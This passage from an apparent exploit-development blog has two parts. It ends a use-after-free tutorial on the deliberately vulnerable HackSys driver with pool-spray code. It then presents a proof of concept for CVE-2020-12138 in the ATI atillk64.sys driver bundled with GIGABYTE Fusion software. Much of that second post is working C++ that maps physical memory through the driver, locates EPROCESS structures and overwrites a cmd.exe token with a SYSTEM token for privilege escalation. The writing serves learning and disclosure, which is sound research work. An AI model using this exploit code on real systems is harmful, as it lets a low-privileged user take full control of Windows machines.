We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

By: h0mbre
25 April 2020 at 04:00

Background

I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

  • Jackson T’s write-up of an LG driver privilege escalation vulnerability,
  • hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
  • ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

  • allow low-privileged users to interact with it,
  • have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.

Disclaimer

This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked was that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version 5.11.9.0 and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

Reversing the driver was pretty easy even as a complete novice just because it is so small. There is the hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address as a parameter and a length (and cache type) and maps that memory into system memory and returns a pointer to the now virtual address that corresponds to the beginning of the physical memory you asked to be mapped. So at this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are taken from rdi offsets which is the address of our input buffer. CacheType is hardcoded as 0.

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next, is a call to MmMapLockedPages, which is an old an deprecated API. This call takes the updated MDL and maps the physical pages that are described by it into our process space. It returns the starting address of this mapping to us eventually you’ll see as the return value (rax) is eventually placed in rbx and moved to [rdi] which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes from physical address offset 0x100000000 all of the data from 0x100000000 to 0x100001000 would be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

  • map physical memory into our process space,
  • parse through the data looking for “Proc” pool tags,
  • identify our calling process (typically cmd.exe) and note the location of our security token,
  • identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
  • and finally, overwrite our token with the SYSTEM process token value to gain nt authority/system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be pool chunk header and then a tag prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 as an integer value.

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for data we’re interested in, is to start at our mapped address and iterate by 0x10 each time and checking the value of our address + 0x4 for “Proc”.

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

  • ImageFileName (the name of the process),
  • UniqueProcessId, and
  • Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

  • 0x2e8 to the UniqueProcessId,
  • 0x360 to the Token, and
  • 0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for these varying, let’s just call them “headers” informally for now, sizes. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

  • find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
  • once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
  • take the location of “Proc” and add it to a vector,
  • take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

  • (“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
  • (“Proc” - 0x4) + header-size + 0x360 = Token,
  • (“Proc” - 0x4) + header-size + 0x450 = UniqueProcessId.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that 0xFFFFD48CB102D320 - 0x4 is “Proc”. Our header marker 0x00B80003, denoting when the header ends, is at offset 0x60 from there. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.

I used two main functions, the first function maps memory iteratively looking to identify the physical addresses of of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);
                            
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;

The next function takes the returned proc_data struct and re-maps 0x1000 bytes of physical memory starting at the physical memory address of the “Proc” tag (-0x4) but from the beginning of that page. The largest header length I found being 0x90, and the largest offset of interest being 0x450, we definitely don’t need to map this much from this address but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members and goes looking for any likely to be SYSTEM process as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

If it finds one of these processes and our cmd.exe process it will overwrite the cmd.exe Token with the Token value of a privileged process giving us an nt authority\system shell.

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This wasn’t often the case whenever the test machine was left running for at least 2-3 minutes after booting.

Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

